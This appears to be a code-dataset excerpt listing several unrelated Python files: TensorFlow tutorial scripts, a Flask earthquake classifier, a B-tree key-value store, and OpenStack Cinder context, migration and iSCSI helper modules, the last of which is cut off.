repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
apastoriza/tf-ninja | tfninja/tf101/model101.py | <reponame>apastoriza/tf-ninja
# coding=utf-8
"""Build TensorFlow 1.x constants of increasing rank and log their shapes.

Demonstrates creating tensors both from native Python literals and from
NumPy arrays (via tf.constant and tf.convert_to_tensor).
"""
import numpy as np
import tensorflow as tf

from tfninja.utils import loggerfactory

logger = loggerfactory.get_logger(__name__)

# Rank-0 through rank-3 tensors built from Python literals.
SCALAR = tf.constant(100)                      # shape: ()
VECTOR = tf.constant([1, 2, 3, 4, 5])          # shape: (5,)
MATRIX = tf.constant([[1, 2, 3], [4, 5, 6]])   # shape: (2, 3)
CUBE_MATRIX = tf.constant([                    # shape: (3, 3, 1)
    [
        [1], [2], [3]
    ], [
        [4], [5], [6]
    ], [
        [7], [8], [9]
    ]
])

logger.info('scalar (native): %s', SCALAR.get_shape())
logger.info('vector (native): %s', VECTOR.get_shape())
logger.info('matrix (native): %s', MATRIX.get_shape())
logger.info('cube (native): %s', CUBE_MATRIX.get_shape())

# create a tf.constant() from numpy array
np_vector = np.array([6, 7, 8, 9, 10])
VECTOR2 = tf.constant(np_vector)
logger.info('vector (numpy ): %s', VECTOR2.get_shape())

# another way to create a tensor from numpy array
np_3d = np.array([                             # shape: (3, 3, 3)
    [
        [0, 1, 2],
        [3, 4, 5],
        [6, 7, 8]
    ], [
        [9, 10, 11],
        [12, 13, 14],
        [15, 16, 17]
    ], [
        [18, 19, 20],
        [21, 22, 23],
        [24, 25, 26]
    ]
])
# convert_to_tensor also casts the integer array to float64 here.
TENSOR_3D = tf.convert_to_tensor(np_3d, dtype=tf.float64)
logger.info('tensor_3d (numpy ): %s', TENSOR_3D.get_shape())
|
apastoriza/tf-ninja | tfninja/utils/time.py | <filename>tfninja/utils/time.py
# coding=utf-8
import time
from datetime import datetime
def current_time_in_millis():
    """Return the current Unix epoch time in whole milliseconds."""
    millis = time.time() * 1000
    return int(round(millis))
def current_time_in_microsecs():
    """Return the current Unix epoch time in whole microseconds.

    Bug fix: the previous implementation returned only
    ``datetime.now().microsecond`` — the sub-second component (0-999999) —
    rather than a timestamp, which was inconsistent with
    current_time_in_millis() above.
    """
    return int(round(time.time() * 1000000))
|
apastoriza/tf-ninja | tfninja/tf101/session104.py | <filename>tfninja/tf101/session104.py
# coding=utf-8
import numpy as np
import tensorflow as tf
from tfninja.utils import loggerfactory
logger = loggerfactory.get_logger(__name__)
# Dimensions of the random matrix fed into the graph at run time.
rows = 3
cols = 2
# Placeholder for a rows x cols float32 matrix supplied via feed_dict.
x = tf.placeholder(tf.float32, name='random_matrix', shape=(rows, cols))
# Graph op that element-wise doubles the input (x + x).
add_operation = tf.add(x, x)
def run_session():
    """Feed a random matrix through the graph and log the x + x result."""
    matrix = np.random.rand(rows, cols)
    logger.info('\ndata:\n %s', matrix)
    feed = {x: matrix}
    with tf.Session() as session:
        doubled = session.run(add_operation, feed_dict=feed)
        logger.info('\nadd result:\n %s', doubled)


if __name__ == '__main__':
    run_session()
|
apastoriza/tf-ninja | tfninja/tf101/session102.py | # coding=utf-8
import tensorflow as tf
from tfninja.utils import loggerfactory
logger = loggerfactory.get_logger(__name__)
# Counter variable, incremented once per loop iteration in run_session().
value = tf.Variable(0, name='value')
ONE = tf.constant(1)
# value + 1, and the assign op that writes the sum back into the variable.
new_value = tf.add(value, ONE)
update_value = tf.assign(value, new_value)
def run_session():
    """Initialize the counter variable and increment it ten times, logging each value."""
    # Variables hold their declared values only after the initializer op has
    # run inside a session; here `value` starts at 0.
    init_op = tf.global_variables_initializer()
    with tf.Session() as session:
        session.run(init_op)
        logger.info('Variable initial value: %s', session.run(value))
        for _ in range(10):
            # Apply value <- value + 1, then read it back.
            session.run(update_value)
            logger.info('Variable value: %s', session.run(value))


if __name__ == '__main__':
    run_session()
|
apastoriza/tf-ninja | tfninja/tf102/softmax101.py | # coding=utf-8
import math
def run_softmax():
    """Compute the softmax of a fixed logit vector; print and return it.

    Improvement: the distribution was previously only printed, so callers
    could not use (or test) the computed values; it is now also returned.
    Dead commented-out code was removed.

    :returns: list of probabilities (each rounded to 3 decimals) summing
        to ~1.0, one per input logit.
    """
    logits = [1.0, 2.0, 3.0, 4.0, 1.0, 2.0, 3.0]
    print([round(value, 3) for value in logits])
    exponentials = [math.exp(value) for value in logits]
    print([round(value, 3) for value in exponentials])
    total = sum(exponentials)
    softmax = [round(value / total, 3) for value in exponentials]
    print(softmax)
    return softmax


if __name__ == '__main__':
    run_softmax()
|
apastoriza/tf-ninja | tfninja/tf102/softmax102_relu_dropout.py | <reponame>apastoriza/tf-ninja<gh_stars>0
# coding=utf-8
import math
import numpy as np
import tensorflow as tf
from random import randint
from tfninja.resources import config
from tfninja.resources import mnist_input_data
from tfninja.utils import loggerfactory
from tfninja.utils import time
logger = loggerfactory.get_logger(__name__)
# Training hyper-parameters.
BATCH_SIZE = 100
TRAINING_EPOCHS = 1000        # upper bound; training stops early on accuracy
EXPECTED_ACCURACY = 0.973     # early-stopping target on the test set
# Exponential learning-rate decay bounds (see run_session()).
MAX_LEARNING_RATE = 0.003
MIN_LEARNING_RATE = 0.0001
DECAY_SPEED = 2000
# Probability of *keeping* a unit during dropout (training-time regularizer).
KEEP_PROBABILITY = 0.75
# Widths of the 5 fully-connected layers; the last is 10 (one per digit).
LAYER_NEURONS_1 = 200
LAYER_NEURONS_2 = 100
LAYER_NEURONS_3 = 60
LAYER_NEURONS_4 = 30
LAYER_NEURONS_5 = 10

# About MNIST database
IMAGE_PX_WIDTH = 28
IMAGE_PX_HEIGHT = 28
IMAGE_SIZE = IMAGE_PX_WIDTH * IMAGE_PX_HEIGHT

# Inputs: flattened 28x28 images and their one-hot digit labels.
X_image = tf.placeholder(tf.float32, [None, IMAGE_SIZE], name='input')
Y_probabilities = tf.placeholder(tf.float32, [None, LAYER_NEURONS_5])

# Weights start as small truncated normals, biases at zero.
W_layer_1 = tf.Variable(tf.truncated_normal([IMAGE_SIZE, LAYER_NEURONS_1], stddev=0.1))
bias_tensor_1 = tf.Variable(tf.zeros([LAYER_NEURONS_1]))
W_layer_2 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_1, LAYER_NEURONS_2], stddev=0.1))
bias_tensor_2 = tf.Variable(tf.zeros([LAYER_NEURONS_2]))
W_layer_3 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_2, LAYER_NEURONS_3], stddev=0.1))
bias_tensor_3 = tf.Variable(tf.zeros([LAYER_NEURONS_3]))
W_layer_4 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_3, LAYER_NEURONS_4], stddev=0.1))
bias_tensor_4 = tf.Variable(tf.zeros([LAYER_NEURONS_4]))
W_layer_5 = tf.Variable(tf.truncated_normal([LAYER_NEURONS_4, LAYER_NEURONS_5], stddev=0.1))
bias_tensor_5 = tf.Variable(tf.zeros([LAYER_NEURONS_5]))

XX_flatten_images = tf.reshape(X_image, [-1, IMAGE_SIZE])

# define a dropout ratio
keep_prob = tf.placeholder(tf.float32, name='keep_prob')

# Four ReLU layers, each followed by dropout, then a linear output layer.
Y_output_1 = tf.nn.relu(tf.matmul(XX_flatten_images, W_layer_1) + bias_tensor_1)
Y_dropout_1 = tf.nn.dropout(Y_output_1, keep_prob)
Y_output_2 = tf.nn.relu(tf.matmul(Y_dropout_1, W_layer_2) + bias_tensor_2)
Y_dropout_2 = tf.nn.dropout(Y_output_2, keep_prob)
Y_output_3 = tf.nn.relu(tf.matmul(Y_dropout_2, W_layer_3) + bias_tensor_3)
Y_dropout_3 = tf.nn.dropout(Y_output_3, keep_prob)
Y_output_4 = tf.nn.relu(tf.matmul(Y_dropout_3, W_layer_4) + bias_tensor_4)
Y_dropout_4 = tf.nn.dropout(Y_output_4, keep_prob)
Y_logits = tf.matmul(Y_dropout_4, W_layer_5) + bias_tensor_5
Y = tf.nn.softmax(Y_logits)

# Cross-entropy is computed from the raw logits (numerically stable) and
# scaled by 100 for more readable TensorBoard plots.
softmax_cross_entropy_with_logits = tf.nn.softmax_cross_entropy_with_logits_v2(logits=Y_logits, labels=Y_probabilities)
cross_entropy = tf.reduce_mean(softmax_cross_entropy_with_logits) * 100
correct_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Y_probabilities, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

# learning rate is a tensor too
learning_rate = tf.placeholder(tf.float32, name='learning_rate')
train_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)
def setup_tensor_board(session):
    """Create TensorBoard scalar summaries and a writer bound to *session*.

    :param session: active tf.Session whose graph is written to the log dir.
    :returns: (merged_summaries, summary_writer) tuple.
    """
    logs_path = config.paths['dir'] + '/logs/tfninja_softmax102_relu_dropout'
    tf.summary.scalar('cost', cross_entropy)
    tf.summary.scalar('accuracy', accuracy)
    merged = tf.summary.merge_all()
    writer = tf.summary.FileWriter(logs_path, graph=session.graph)
    return merged, writer
def run_session():
    """Train the 5-layer ReLU/dropout network on MNIST and report accuracy.

    Trains for at most TRAINING_EPOCHS epochs, stopping early once test
    accuracy exceeds EXPECTED_ACCURACY, then runs predict_numbers() on the
    test set.

    Bug fix: the test-set accuracy was previously evaluated with
    keep_prob=KEEP_PROBABILITY, i.e. with dropout still active. Dropout is a
    training-only regularizer; evaluation must keep every activation
    (keep_prob=1.0), otherwise accuracy is randomly under-reported.
    """
    with tf.Session() as session:
        session.run(tf.global_variables_initializer())
        summaries, summary_writer = setup_tensor_board(session)
        logger.info('-------TRAINING INIT-------')
        init_time_in_millis = time.current_time_in_millis()
        accuracy_value = 0
        data_sets = mnist_input_data.gather_data()
        epoch = 0
        while (epoch < TRAINING_EPOCHS) and (accuracy_value <= EXPECTED_ACCURACY):
            batch_count = int(data_sets.train.num_examples / BATCH_SIZE)
            for i in range(batch_count):
                batch_x, batch_y = data_sets.train.next_batch(BATCH_SIZE)
                # NOTE(review): the decay uses the *batch* index i, which
                # resets every epoch, so the learning rate restarts high each
                # epoch. Presumably a global step was intended -- confirm
                # before changing.
                lr = MIN_LEARNING_RATE + (MAX_LEARNING_RATE - MIN_LEARNING_RATE) * math.exp(-i / DECAY_SPEED)
                _, summary = session.run([train_step, summaries], feed_dict={
                    X_image: batch_x,
                    Y_probabilities: batch_y,
                    keep_prob: KEEP_PROBABILITY,
                    learning_rate: lr
                })
                summary_writer.add_summary(summary, epoch * batch_count + i)
            # keep_prob=1.0 disables dropout for evaluation (see docstring).
            accuracy_value = accuracy.eval(feed_dict={
                X_image: data_sets.test.images,
                Y_probabilities: data_sets.test.labels,
                keep_prob: 1.0
            })
            if epoch % 10 == 0:
                logger.info('Epoch: %s', epoch)
                logger.info('Current accuracy: %s', accuracy_value)
            epoch += 1
        end_time_in_millis = time.current_time_in_millis()
        logger.info('Epoch: %s', epoch)
        logger.info('-------TRAINING DONE-------')
        logger.info('Total time: %s millis', (end_time_in_millis - init_time_in_millis))
        logger.info('Expected accuracy: %s', accuracy_value)
        predict_numbers(session, data_sets.test)
def predict_numbers(session, test_data_set):
    """Classify 1000 random test images and log the observed accuracy.

    :param session: active tf.Session with trained variables.
    :param test_data_set: MNIST test split with .images and .labels arrays.

    Bug fixes:
    - random.randint() is inclusive on BOTH ends, so randint(0, shape[0])
      could return shape[0] and raise IndexError; the upper bound is now
      shape[0] - 1.
    - inference now feeds keep_prob=1.0 -- dropout is a training-only
      regularizer and previously randomly zeroed 25% of activations at
      prediction time.
    """
    trials = 1000
    rights = 0
    for _ in range(trials):
        num = randint(0, test_data_set.images.shape[0] - 1)
        img = test_data_set.images[num]
        classification = session.run(tf.argmax(Y, 1), feed_dict={
            X_image: [img],
            keep_prob: 1.0
        })
        if classification[0] == np.argmax(test_data_set.labels[num]):
            rights += 1
        else:
            logger.error('Neural Network predicted %s', classification[0])
            logger.error('Real label is: %s', np.argmax(test_data_set.labels[num]))
    logger.info('Real accuracy: %s/%s = %s', rights, trials, (rights / trials))


if __name__ == '__main__':
    run_session()
|
syukronahmd/Machine-Learning | app/run.py | import pickle
import pandas as pd
from flask import Flask, render_template, request
app = Flask(__name__)
# NOTE(review): pickle.load executes arbitrary code from the file; this is
# only acceptable because 'gempa.sav' ships with the app. Never load an
# untrusted pickle. The file handle is also never closed -- confirm intent.
model = pickle.load(open('gempa.sav', 'rb'))
@app.route("/")
def home():
    """Render the landing page."""
    return render_template("home.html")
@app.route("/visualization")
def visualization():
    """Render the static data-visualization page."""
    return render_template("visualization.html")
@app.route("/classification", methods=["GET", "POST"])
def classification():
if request.method == "POST":
latitude = request.form.get('latitude') or 0
longitude = request.form.get('longitude') or 0
depth = request.form.get('depth') or 0
magnitude = request.form.get('magnitude') or 0
features = [[latitude, longitude, depth, magnitude]]
df = pd.DataFrame(features, columns=['Latitude', 'Longitude', 'Depth', 'Magnitude'])
binary_value = str([i for i in model.predict(df)][0])
result = "Earthquake" if binary_value == "1" else "Not Earthquake"
return render_template("classification.html", result=result)
return render_template("classification.html")
if __name__ == "__main__":
app.run() |
airnandez/lsst-jupyter-kernel | lsst_distrib/kernel_launcher.py | <reponame>airnandez/lsst-jupyter-kernel<gh_stars>0
import sys
import os
import runpy
from typing import List
def reorder_paths(paths: List[str], prefix: str = None) -> List[str]:
    """Return *paths* with entries under *prefix* (and '') moved to the front.

    Relative order within the "head" (prefix matches plus the empty entry)
    and "tail" groups is preserved. With prefix=None the original list is
    returned unchanged.

    Improvements: `not p in head` replaced with the idiomatic `p not in`,
    and membership is now tested against a set -- the previous list scan was
    O(len(head)) per element.
    """
    if prefix is None:
        return paths
    head = [p for p in paths if p.startswith(prefix) or p == '']
    head_set = set(head)
    tail = [p for p in paths if p not in head_set]
    return head + tail


if __name__ == '__main__':
    # Move conda-provided entries to the front of sys.path, then hand off to
    # the regular IPython kernel entry point.
    sys.path = reorder_paths(sys.path, os.environ.get('CONDA_PREFIX'))
    runpy.run_module('ipykernel_launcher', run_name='__main__')
|
shanizalh/portfolio | database-key-value/btree.py | class Node:
def __init__(self, keys=None, children=None):
self.keys = keys or []
self.children = children or []
def is_leaf(self):
return len(self.children) == 0
def __repr__(self):
# Helpful method to keep track of Node keys.
return "<Node: {}>".format(self.keys)
class BTree:
    """A B-tree of minimum degree *t*.

    Nodes hold at most 2*t - 1 keys. Insertion splits full nodes on the way
    down (pre-emptive splitting), so a node is never full when descended
    into. Keys are expected to support comparison against search terms;
    search() additionally reads ``key.value``, which assumes NodeKey-style
    entries -- TODO confirm plain keys are never stored.
    """

    def __init__(self, t):
        # t: minimum degree; a node is "full" at 2*t - 1 keys.
        self.t = t
        self.root = None

    def insert_multiple(self, keys):
        """Insert each key from *keys*, in order."""
        for key in keys:
            self.insert(key)

    def insert(self, key):
        """Insert *key*, growing a new root first when the root is full."""
        if not self.root:
            self.root = Node(keys=[key])
            return
        if len(self.root.keys) == 2*self.t - 1:
            # Root is full: split it and grow the tree by one level.
            old_root = self.root
            self.root = Node()
            left, right, new_key = self.split(old_root)
            self.root.keys.append(new_key)
            self.root.children.append(left)
            self.root.children.append(right)
        self.insert_non_full(self.root, key)

    def insert_non_full(self, node, key):
        """Insert *key* under *node*, splitting any full child on the way."""
        if node.is_leaf():
            # Find the sorted position and insert directly.
            index = 0
            for k in node.keys:
                if key > k:
                    index += 1
                else:
                    break
            node.keys.insert(index, key)
            return
        # Pick the child subtree that should contain the key.
        index = 0
        for k in node.keys:
            if key > k:
                index += 1
            else:
                break
        if len(node.children[index].keys) == 2*self.t - 1:
            # Child is full: split it, lift the median into this node, and
            # choose which half receives the new key.
            left_node, right_node, new_key = self.split(node.children[index])
            node.keys.insert(index, new_key)
            node.children[index] = left_node
            node.children.insert(index+1, right_node)
            if key > new_key:
                index += 1
        self.insert_non_full(node.children[index], key)

    def split(self, node):
        """Split *node* in half; return (left, right, median_key)."""
        # NOTE(review): left takes children[:len//2+1] while right takes
        # children[len//2:], so for an internal node one child appears in
        # BOTH halves -- looks like an off-by-one; confirm against tests
        # before relying on internal-node splits.
        left_node = Node(
            keys=node.keys[:len(node.keys)//2],
            children=node.children[:len(node.children)//2+1]
        )
        right_node = Node(
            keys=node.keys[len(node.keys)//2:],
            children=node.children[len(node.children)//2:]
        )
        # The median key moves up to the parent.
        key = right_node.keys.pop(0)
        return left_node, right_node, key

    def search(self, node, term):
        """Return the stored value for *term* under *node*, or None."""
        if not self.root:
            return None
        index = 0
        for key in node.keys:
            if key == term:
                # Assumes keys are NodeKey instances -- a bare key here
                # would raise AttributeError. TODO confirm.
                return key.value
            if term > key:
                index += 1
        if node.is_leaf():
            return None
        return self.search(node.children[index], term)

    def greater_than(self, node, term, upper_bound=None, inclusive=False):
        """Collect keys > *term* (>= when *inclusive*), optionally capped.

        When *upper_bound* is given, keys at or beyond it stop the scan
        (the bound itself is included only when *inclusive* is set).
        """
        if not self.root:
            return []
        index = 0
        values = []
        for key in node.keys:
            if upper_bound is not None:
                if inclusive and key == upper_bound:
                    values.append(key)
                if key >= upper_bound:
                    break
            if term > key:
                # Key too small: the matching range starts further right.
                index += 1
                continue
            if inclusive and key == term:
                values.append(key)
            if key > term:
                values.append(key)
            if not node.is_leaf():
                # Subtree left of this key may still hold in-range keys.
                values += self.greater_than(
                    node.children[index],
                    term,
                    upper_bound,
                    inclusive
                )
            index += 1
        if not node.is_leaf():
            # Rightmost subtree after the last visited key.
            values += self.greater_than(
                node.children[index],
                term,
                upper_bound,
                inclusive
            )
        return values

    def less_than(self, node, term, lower_bound=None, inclusive=False):
        """Collect keys < *term* (<= when *inclusive*), optionally floored.

        When *lower_bound* is given, keys below it are skipped (the bound
        itself is included only when *inclusive* is set).
        """
        if not self.root:
            return []
        index = 0
        values = []
        for key in node.keys:
            if lower_bound is not None:
                if inclusive and key == lower_bound:
                    values.append(key)
                if key < lower_bound:
                    index += 1
                    continue
            if inclusive and key == term:
                values.append(key)
            if key < term:
                values.append(key)
            if not node.is_leaf():
                values += self.less_than(
                    node.children[index],
                    term,
                    lower_bound,
                    inclusive
                )
            index += 1
        # NOTE(review): `key` here is the last loop variable -- this raises
        # NameError on a node with no keys, and gates the final subtree on
        # the last key only. Presumably safe for well-formed trees; confirm.
        if not node.is_leaf() and key <= term:
            values += self.less_than(
                node.children[index],
                term,
                lower_bound,
                inclusive
            )
        return values
class NodeKey:
    """A comparable (key, value) pair; ordering and equality use only *key*.

    Comparisons accept either another NodeKey or a bare key, so NodeKeys can
    be compared directly against raw search terms.

    Bug fix: defining ``__eq__`` without ``__hash__`` silently made the
    class unhashable in Python 3; ``__hash__`` is now defined consistently
    with equality (hash of the key), so NodeKeys can live in sets/dicts.
    """

    def __init__(self, key, value):
        self.key = key
        self.value = value

    def __repr__(self):
        return '<NodeKey: ({}, {})>'.format(self.key, self.value)

    def _other_key(self, other):
        # Normalize the comparand: unwrap a NodeKey, pass bare keys through.
        return other.key if isinstance(other, self.__class__) else other

    def __eq__(self, other):
        return self.key == self._other_key(other)

    def __hash__(self):
        # Consistent with __eq__: equal NodeKeys (same key) hash alike,
        # and a NodeKey hashes like its bare key.
        return hash(self.key)

    def __gt__(self, other):
        return self.key > self._other_key(other)

    def __ge__(self, other):
        return self.key >= self._other_key(other)

    def __lt__(self, other):
        return self.key < self._other_key(other)

    def __le__(self, other):
        return self.key <= self._other_key(other)
|
adelina-t/cinder | cinder/context.py | # Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of cinder."""
import copy
import uuid
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import local
from cinder.openstack.common import log as logging
from cinder.openstack.common import timeutils
from cinder import policy
LOG = logging.getLogger(__name__)
def generate_request_id():
    """Return a unique request identifier of the form ``req-<uuid4>``."""
    return 'req-{0}'.format(uuid.uuid4())
class RequestContext(object):
    """Security context and request information.

    Represents the user taking a given action within the system.
    """

    # Template used by to_dict() to build the compact 'user_identity' string.
    user_idt_format = '{user} {tenant} {domain} {user_domain} {p_domain}'

    def __init__(self, user_id, project_id, is_admin=None, read_deleted="no",
                 roles=None, project_name=None, remote_address=None,
                 timestamp=None, request_id=None, auth_token=None,
                 overwrite=True, quota_class=None, service_catalog=None,
                 domain=None, user_domain=None, project_domain=None,
                 **kwargs):
        """Initialize RequestContext.

        :param read_deleted: 'no' indicates deleted records are hidden, 'yes'
            indicates deleted records are visible, 'only' indicates that
            *only* deleted records are visible.
        :param overwrite: Set to False to ensure that the greenthread local
            copy of the index is not overwritten.
        :param kwargs: Extra arguments that might be present, but we ignore
            because they possibly came in from older rpc messages.
        """
        self.user_id = user_id
        self.project_id = project_id
        self.domain = domain
        self.user_domain = user_domain
        self.project_domain = project_domain
        self.roles = roles or []
        self.project_name = project_name
        self.is_admin = is_admin
        if self.is_admin is None:
            # Derive admin-ness from the roles via the policy engine.
            self.is_admin = policy.check_is_admin(self.roles)
        elif self.is_admin and 'admin' not in self.roles:
            # Keep the role list consistent with an explicit admin flag.
            self.roles.append('admin')
        self.read_deleted = read_deleted
        self.remote_address = remote_address
        if not timestamp:
            timestamp = timeutils.utcnow()
        if isinstance(timestamp, basestring):
            # NOTE(review): `basestring` makes this Python 2 only. String
            # timestamps (e.g. deserialized from RPC) are parsed back into
            # datetime objects here.
            timestamp = timeutils.parse_strtime(timestamp)
        self.timestamp = timestamp
        if not request_id:
            request_id = generate_request_id()
        self.request_id = request_id
        self.auth_token = auth_token
        self.quota_class = quota_class
        # Publish as the greenthread-local context unless one already exists
        # and the caller asked not to clobber it.
        if overwrite or not hasattr(local.store, 'context'):
            self.update_store()
        if service_catalog:
            # Only include required parts of service_catalog
            self.service_catalog = [s for s in service_catalog
                                    if s.get('type') in ('compute',)]
        else:
            # if list is empty or none
            self.service_catalog = []

    def _get_read_deleted(self):
        return self._read_deleted

    def _set_read_deleted(self, read_deleted):
        # Reject anything outside the three supported visibility modes.
        if read_deleted not in ('no', 'yes', 'only'):
            raise ValueError(_("read_deleted can only be one of 'no', "
                               "'yes' or 'only', not %r") % read_deleted)
        self._read_deleted = read_deleted

    def _del_read_deleted(self):
        del self._read_deleted

    # Validating property wrapped around self._read_deleted.
    read_deleted = property(_get_read_deleted, _set_read_deleted,
                            _del_read_deleted)

    def update_store(self):
        # Make this context the greenthread-local "current" context.
        local.store.context = self

    def to_dict(self):
        """Serialize the context (e.g. for RPC); from_dict() reverses this."""
        user_idt = (
            self.user_idt_format.format(user=self.user or '-',
                                        tenant=self.tenant or '-',
                                        domain=self.domain or '-',
                                        user_domain=self.user_domain or '-',
                                        p_domain=self.project_domain or '-'))
        return {'user_id': self.user_id,
                'project_id': self.project_id,
                'project_name': self.project_name,
                'domain': self.domain,
                'user_domain': self.user_domain,
                'project_domain': self.project_domain,
                'is_admin': self.is_admin,
                'read_deleted': self.read_deleted,
                'roles': self.roles,
                'remote_address': self.remote_address,
                'timestamp': timeutils.strtime(self.timestamp),
                'request_id': self.request_id,
                'auth_token': self.auth_token,
                'quota_class': self.quota_class,
                'service_catalog': self.service_catalog,
                'tenant': self.tenant,
                'user': self.user,
                'user_identity': user_idt}

    @classmethod
    def from_dict(cls, values):
        """Rebuild a context from to_dict() output."""
        return cls(**values)

    def elevated(self, read_deleted=None, overwrite=False):
        """Return a version of this context with admin flag set."""
        context = copy.copy(self)
        context.is_admin = True
        if 'admin' not in context.roles:
            context.roles.append('admin')
        if read_deleted is not None:
            context.read_deleted = read_deleted
        return context

    def deepcopy(self):
        return copy.deepcopy(self)

    # NOTE(sirp): the openstack/common version of RequestContext uses
    # tenant/user whereas the Cinder version uses project_id/user_id. We need
    # this shim in order to use context-aware code from openstack/common, like
    # logging, until we make the switch to using openstack/common's version of
    # RequestContext.
    @property
    def tenant(self):
        return self.project_id

    @property
    def user(self):
        return self.user_id
def get_admin_context(read_deleted="no"):
    """Return an anonymous admin context (no user/project attached).

    overwrite=False so the greenthread-local request context, if any, is
    left untouched.
    """
    return RequestContext(user_id=None,
                          project_id=None,
                          is_admin=True,
                          read_deleted=read_deleted,
                          overwrite=False)
|
adelina-t/cinder | cinder/db/sqlalchemy/migration.py | <filename>cinder/db/sqlalchemy/migration.py
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
import sqlalchemy
from cinder.db.sqlalchemy.api import get_engine
from cinder import exception
from cinder.openstack.common.gettextutils import _
# Version the migrate repository starts from; databases that predate version
# control are stamped with this before querying their version.
INIT_VERSION = 000
# Lazily-initialized, module-level cache for the migrate Repository
# (see _find_migrate_repo()).
_REPOSITORY = None
def db_sync(version=None):
    """Migrate the database schema to *version* (latest when None).

    Upgrades when the target is ahead of (or unspecified relative to) the
    current version, downgrades otherwise.

    :raises exception.Error: when *version* is not an integer.
    """
    if version is not None:
        try:
            version = int(version)
        except ValueError:
            raise exception.Error(_("version should be an integer"))

    current_version = db_version()
    repository = _find_migrate_repo()
    engine = get_engine()
    if version is None or version > current_version:
        return versioning_api.upgrade(engine, repository, version)
    return versioning_api.downgrade(engine, repository, version)
def db_version():
    """Return the database's current migration version.

    :raises exception.Error: when the database has tables but is not under
        version control (pre-Essex schema).
    """
    repository = _find_migrate_repo()
    try:
        return versioning_api.db_version(get_engine(), repository)
    except versioning_exceptions.DatabaseNotControlledError:
        # If we aren't version controlled we may already have the database
        # in the state from before we started version control, check for that
        # and set up version_control appropriately
        meta = sqlalchemy.MetaData()
        engine = get_engine()
        meta.reflect(bind=engine)
        tables = meta.tables
        if len(tables) == 0:
            # Brand-new, empty database: stamp it with the initial version
            # and retry.
            db_version_control(INIT_VERSION)
            return versioning_api.db_version(get_engine(), repository)
        else:
            raise exception.Error(_("Upgrade DB using Essex release first."))
def db_initial_version():
    """Return the version the migration repository starts at."""
    return INIT_VERSION
def db_version_control(version=None):
    """Place the database under migrate's version control at *version*.

    :returns: the version the database was stamped with.
    """
    repository = _find_migrate_repo()
    versioning_api.version_control(get_engine(), repository, version)
    return version
def _find_migrate_repo():
    """Get the path for the migrate repository.

    The Repository object is cached at module level so repeated calls do not
    re-scan the migrate_repo directory.

    :raises exception.Error: when the migrate_repo directory is missing.
    """
    global _REPOSITORY
    path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                        'migrate_repo')
    # Explicit check instead of `assert`: assertions are stripped when Python
    # runs with -O, which would turn a missing repo into an obscure failure
    # inside Repository(). Raising exception.Error matches the error style
    # used elsewhere in this module.
    if not os.path.exists(path):
        raise exception.Error(_("Could not find migrate repo at %s") % path)
    if _REPOSITORY is None:
        _REPOSITORY = Repository(path)
    return _REPOSITORY
|
adelina-t/cinder | cinder/brick/iscsi/iscsi.py | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper code for the iSCSI volume driver.
"""
import contextlib
import os
import re
import stat
import time
from cinder.brick import exception
from cinder.brick import executor
from cinder.openstack.common import fileutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils as putils
LOG = logging.getLogger(__name__)
class TargetAdmin(executor.Executor):
    """iSCSI target administration.

    Base class for iSCSI target admin helpers.

    Subclasses wrap a specific admin binary (e.g. tgtadm, ietadm) and
    implement the create/remove/show operations below.
    """

    def __init__(self, cmd, root_helper, execute):
        super(TargetAdmin, self).__init__(root_helper, execute=execute)
        # The admin binary _run() invokes.
        self._cmd = cmd

    def _run(self, *args, **kwargs):
        # All target administration requires root privileges.
        self._execute(self._cmd, *args, run_as_root=True, **kwargs)

    def create_iscsi_target(self, name, tid, lun, path,
                            chap_auth=None, **kwargs):
        """Create an iSCSI target and logical unit."""
        raise NotImplementedError()

    def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
        """Remove an iSCSI target and logical unit."""
        raise NotImplementedError()

    def _new_target(self, name, tid, **kwargs):
        """Create a new iSCSI target."""
        raise NotImplementedError()

    def _delete_target(self, tid, **kwargs):
        """Delete a target."""
        raise NotImplementedError()

    def show_target(self, tid, iqn=None, **kwargs):
        """Query the given target ID."""
        raise NotImplementedError()

    def _new_logicalunit(self, tid, lun, path, **kwargs):
        """Create a new LUN on a target using the supplied path."""
        raise NotImplementedError()

    def _delete_logicalunit(self, tid, lun, **kwargs):
        """Delete a logical unit from a target."""
        raise NotImplementedError()
class TgtAdm(TargetAdmin):
    """iSCSI target administration using tgtadm."""

